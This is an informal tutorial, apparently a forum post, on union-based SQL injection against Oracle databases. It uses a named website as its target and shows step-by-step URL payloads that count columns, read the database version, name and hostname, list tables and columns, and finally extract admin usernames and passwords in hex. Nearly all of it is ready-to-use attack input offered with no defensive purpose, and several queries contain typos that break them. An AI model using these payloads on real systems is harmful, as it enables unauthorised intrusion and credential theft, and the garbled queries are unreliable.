Oracle SQL Injection (union besed)

Hello dear visitors, i hope that you are fine:)
Oracle SQL Injection (union besed)

lets start with this exemple (juste exemple :D )
http://votrecodeur.com/
 try every bad char, like : '
http://votrecodeur.com/index.php?id=1'

 you shold get error (Warning:  ociexecute():)
ok ? good, lets send RQT on each record:

index.php?id=1 order by 1 ok
index.php?id=1 order by 2-- ok
index.php?id=1order by 3-- ok
index.php?id=1 order by 4-- error

 so, what ?
simply we have three 3 columns !
index.php?id=1 union select 1,2,3--
index.php?id=1 union select 1,2,3

error? Greaaat :)
lets try null:
index.php?id=1 union select null,null,null

error ? again ? yes yes.. that what we want ;)

try a char convert in one then complet your RQT with: from dual :

index.php?id=1 union select to_char(546),null,null  from dual
no ? char convert in the secend, the the next... to get printing the number you convert :)

 then we try to get DB version:
index.php?id=1 union select null,version,null  from v$instance

try to get DB name :
index.php?id=1 union select null,name,null  from v$database

its ok ? good.. maybe we need hostname too :
index.php?id=1 union select null,host_name,null  from v$instance

like that you can complete and get all informations you need...

-table have column named : password for exemple :)
index.php?id=1 union select null,table_name,null from+all_tab_columns WHERE COLUMN_name='PASSWORD'

-trans : where test=1, test=2, test=3 .. etc
index.php?id=1 union select null,table_name,null from (select ROWNUM r,table_name from all_tables order by table_name) where test=1

maybe you need to hetx it ;)
index.php?id=1 union select  null,rawtohex(table_name),null from (select ROWNUM r,table_n a m e from all_tables  order by table_name) where test=1

now, try to get info:)
index.php?id=1 union select  null,column_name,null from (select ROWNUM r,column_name from all_tab_columns where table_name= CHR(50) || CHR(75) || CHR(98) where test=1


you can test with "test" : test=1, test=2, test=3... etc.


note : (CHR(50) || CHR(75) || CHR(98)) is an exemple :)

do you want to try hex ???
ok, take :
index.php?id=1 union select  null,rawtohex(column_n a m e),null from (select ROWNUM r,column_name from all_tab_columns where table_name= CHR(50) || CHR(75) || CHR(98) where test=1

at this moment we have : the goal table, the goal columns... what we need ?
juste this :
index.php?id=1 union select  null,rawtohex(admin||chr(58)||pass),null from admin_users
you will get infos with hex.. try unhex it :)

good look :)
By Drupal Study